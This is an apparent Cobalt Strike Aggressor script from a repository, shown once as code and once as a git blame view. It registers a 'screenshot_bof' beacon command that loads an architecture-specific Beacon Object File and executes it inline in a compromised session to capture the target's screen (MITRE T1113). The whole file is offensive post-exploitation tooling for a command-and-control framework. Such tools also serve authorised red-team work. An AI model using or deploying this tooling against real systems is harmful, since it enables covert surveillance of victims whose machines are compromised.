ScreenshotBOF/bin/BOF/screenshotBOF.cna

#Register command
beacon_command_register(
    "screenshot_bof",
    "Alternative screenshot capability that does not do fork n run",
    "Synopsis: screenshot_bof"
);

alias screenshot_bof {
    local('$bid $barch $handle $data $args $target_pid');
    $bid = $1;
    # figure out the arch of this session
    $barch  = barch($bid);
    # read in the right BOF file
    $handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
    $data = readb($handle, -1);
    closef($handle);
    
    # announce what we're doing
    btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113");
    # execute it.
    beacon_inline_execute($bid, $data, "go");
}
first commit 2022-10-23 01:58:24 -07:00			`#Register command`
			`beacon_command_register(`
			`"screenshot_bof",`
			`"Alternative screenshot capability that does not do fork n run",`
			`"Synopsis: screenshot_bof"`
			`);`

			`alias screenshot_bof {`
Modified tool to send screenshot to Cobalt Strike's Screenshots tab instead of Downloads. It should be noted that it doesn't render in the Cobalt Strike GUI since it's not in JPG format 2022-10-26 14:01:17 -07:00			`local('$bid $barch $handle $data $args $target_pid');`
			`$bid = $1;`
first commit 2022-10-23 01:58:24 -07:00			`# figure out the arch of this session`
Modified tool to send screenshot to Cobalt Strike's Screenshots tab instead of Downloads. It should be noted that it doesn't render in the Cobalt Strike GUI since it's not in JPG format 2022-10-26 14:01:17 -07:00			`$barch = barch($bid);`
first commit 2022-10-23 01:58:24 -07:00			`# read in the right BOF file`
in memory download 2022-10-25 09:28:47 -07:00			`$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));`
first commit 2022-10-23 01:58:24 -07:00			`$data = readb($handle, -1);`
			`closef($handle);`
in memory download 2022-10-25 09:28:47 -07:00
first commit 2022-10-23 01:58:24 -07:00			`# announce what we're doing`
Modified tool to send screenshot to Cobalt Strike's Screenshots tab instead of Downloads. It should be noted that it doesn't render in the Cobalt Strike GUI since it's not in JPG format 2022-10-26 14:01:17 -07:00			`btask($bid, "Running screenshot BOF by (@codex_tf2)", "T1113");`
first commit 2022-10-23 01:58:24 -07:00			`# execute it.`
Modified tool to send screenshot to Cobalt Strike's Screenshots tab instead of Downloads. It should be noted that it doesn't render in the Cobalt Strike GUI since it's not in JPG format 2022-10-26 14:01:17 -07:00			`beacon_inline_execute($bid, $data, "go");`
in memory download 2022-10-25 09:28:47 -07:00			`}`